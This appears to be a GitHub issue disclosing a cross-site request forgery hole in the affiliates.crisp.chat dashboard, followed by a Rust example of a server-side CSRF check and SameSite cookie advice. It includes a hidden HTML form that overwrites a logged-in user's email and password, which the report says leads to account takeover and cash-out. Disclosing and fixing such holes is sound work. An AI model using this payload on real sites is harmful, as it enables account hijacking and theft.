Open x1ddos opened 4 years ago
Without CSRF, it is possible to create a hidden form like this one:
```html
<form method="post" action="https://affiliates.crisp.chat/dashboard/account/form/account/">
  <input type="hidden" name="email" value="another@example.org">
  <input type="hidden" name="password" value="123">
  <input type="hidden" name="notify_balance" value="0">
</form>
```
then submit it on any user click, on the page where the form is, log in and cash out.
(precondition: account holder needs to be already logged in to affiliates.crisp.chat)
affiliates.crisp.chat
Ref https://github.com/SergioBenitez/Rocket/issues/14
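A server-side check that would reject the form in this report, as an added example that is not part of the original issue, the site's code, or Rocket's API. The `Request` struct, the `Verdict` enum, the `csrf_token` field name, the token value and the `attacker.example` origin are assumptions made for illustration; the allowed origin is taken from the form's `action` host.

```rust
use std::collections::HashMap;

// Origin the dashboard is served from (host taken from the form action in the report).
const ALLOWED_ORIGIN: &str = "https://affiliates.crisp.chat";

// Hypothetical, framework-neutral view of an incoming request.
pub struct Request<'a> {
    pub method: &'a str,
    pub origin: Option<&'a str>,        // Origin header, if the browser sent one
    pub session_token: Option<&'a str>, // CSRF token stored server-side for this session
    pub form: HashMap<&'a str, &'a str>,
}

#[derive(Debug, PartialEq)]
pub enum Verdict { Allow, BadOrigin, MissingToken, TokenMismatch }

// Compare two byte strings without stopping at the first differing byte.
fn ct_eq(a: &[u8], b: &[u8]) -> bool {
    if a.len() != b.len() { return false; }
    a.iter().zip(b).fold(0u8, |acc, (x, y)| acc | (x ^ y)) == 0
}

pub fn check_csrf(req: &Request) -> Verdict {
    // Safe methods must not change state, so they are not checked here.
    if matches!(req.method, "GET" | "HEAD" | "OPTIONS") { return Verdict::Allow; }
    // A form submitted from another site carries that site's Origin.
    if let Some(o) = req.origin {
        if o != ALLOWED_ORIGIN { return Verdict::BadOrigin; }
    }
    // The form must echo the per-session token, which another site cannot read.
    let (Some(expected), Some(got)) = (req.session_token, req.form.get("csrf_token")) else {
        return Verdict::MissingToken;
    };
    if ct_eq(expected.as_bytes(), got.as_bytes()) { Verdict::Allow } else { Verdict::TokenMismatch }
}

fn main() {
    // Constructed request mirroring the hidden form in the report, sent from another site.
    let form = HashMap::from([("email", "another@example.org"), ("password", "123"), ("notify_balance", "0")]);
    let forged = Request { method: "POST", origin: Some("https://attacker.example"),
                           session_token: Some("constructed-token"), form };
    println!("{:?}", check_csrf(&forged));
}
```

Setting `SameSite=Lax` or `SameSite=Strict` on the session cookie complements this check, because the browser then omits the cookie on cross-site form posts.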